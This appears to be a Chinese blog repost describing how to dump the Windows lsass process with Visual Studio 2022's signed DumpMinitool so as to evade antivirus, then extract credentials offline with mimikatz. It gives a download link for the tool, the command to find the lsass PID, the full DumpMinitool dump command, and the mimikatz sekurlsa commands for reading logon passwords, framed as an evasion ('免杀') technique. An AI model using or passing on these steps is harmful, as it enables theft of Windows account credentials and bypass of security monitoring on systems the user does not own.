首页 > 其他分享 >Visual Studio2022微软白名单免杀dump lsass

Visual Studio2022微软白名单免杀dump lsass

时间:2023-03-28 13:14:27浏览次数:50  
标签:exe 免杀 dump -- Studio2022 lsass mimikatz DumpMinitool

1.DumpMinitool获取地址

阿里云盘:https://www.aliyundrive.com/s/qk5zmwQm1Mj 提取码: hy87

DumpMinitool所在路径:

D:\XXX\VisualStudioPro_2022\VisualStudio\Common7\IDE\CommonExtensions\Microsoft\TestWindow\VsTest\Extensions\dump

找不见用everything 搜一下 DumpMinitool

2.mimikatz

下载地址:

https://github.com/gentilkiwi/mimikatz

3.DumpMinitool + mimikatz

3.1 获取 lsass进程 PID

tasklist | findstr "lsass"
img

3.2 DumpHash

DumpMinitool.exe --file lsass.dmp --processId 512 --dumpType Full
--file 输出的路径
--processId lsass.exe进程的ID
--dumpType 方式
img

3.3 本地使用mimikatz解析

mimikatz.exe
sekurlsa::minidump "lsass.dmp"
sekurlsa::logonpasswords
img

大于等于server 2012抓取明文,详见 xxx

标签:exe,免杀,dump,--,Studio2022,lsass,mimikatz,DumpMinitool
From: https://www.cnblogs.com/1nit/p/17264770.html

相关文章

  • 【Visual Leak Detector】配置项 MaxDataDump
    说明使用VLD内存泄漏检测工具辅助开发时整理的学习笔记。本篇介绍VLD配置文件中配置项MaxDataDump的使用方法。同系列文章目录可见《内存泄漏检测工具》目录目录......
  • Exp3-免杀原理
    基础问题回答(1)杀软是如何检测出恶意代码的?根据特征码检测:就是恶意代码都有一些特征数据,也就是特征码,这些特征数据存储在AV厂商的特征库中。如果一个文件被检测出他的某......
  • Visual Studio2022微软白名单免杀dump lsass
    1.DumpMinitool获取地址阿里云盘:https://www.aliyundrive.com/s/qk5zmwQm1Mj提取码:hy87DumpMinitool所在路径:D:\XXX\VisualStudioPro_2022\VisualStudio\Common7\ID......
  • golang 实现的零依赖、高性能、并发 mysqldump 工具。
    mysqldumpgolang中实现的零依赖、高性能、并发mysqldump工具。项目地址:https://github.com/dengjiawen8955/mysqldump/blob/master/README-zh.md文章地址:https:/......
  • Exp3-免杀原理
    一、基础问题回答1、杀软是如何检测出恶意代码的?答:(1)检测特征码人有自己的特征,代码也有自己的特征。杀毒软件都有着一套特征库,依靠检索程序代码是否和库中特征码是否吻......
  • Linux操作系统之tcpdump抓包工具详解
    前言①tcpdump工具简介:tcpdump是Linux操作系统中的字符界面的数据抓包分析软件。tcpdump可以将网络中传送的数据包完全截获下来提供分析②tcpdump是一个用于截取网络分......
  • mysqldump + binlog实现增量备份
    1、核心思路搞明白一件事:到底什么是增量备份?答:①要有全量备份②继续增删改数据③再次需要备份时,不需要进行全量备份,只需要备份binlog日志文件即可(因为binlog日志记录了......
  • 使用mysqldump对Mysql进行备份
    文档课题:使用mysqldump对Mysql进行备份.1、理论知识Mysqldump是用于转存储Mysql数据库的实用程序,它可以转储一个或多个MySQL数据库,对其进行备份或传输到远程服务器.其主要产......
  • linux centos yum 单独安装 mysqldump
    在linux下,mysqldump属于mysql的组件,可以安装mysql获取,如:$yum-yinstallmysql-client1一般情况下,是安装mysql的时候获得mysqldump组件,但有时可能已经安装Mar......
  • 如何在jvm dump出的堆文件中查看指定成员数据,或者全局变量
    很多时候,当程序OOM或者其他异常情况时,我们需要搞清楚当时应用内部数据情况,所有某些时候我们需要查看当时内存镜像中某些成员变量的值。比如查看当时内存实例中数据库账号,......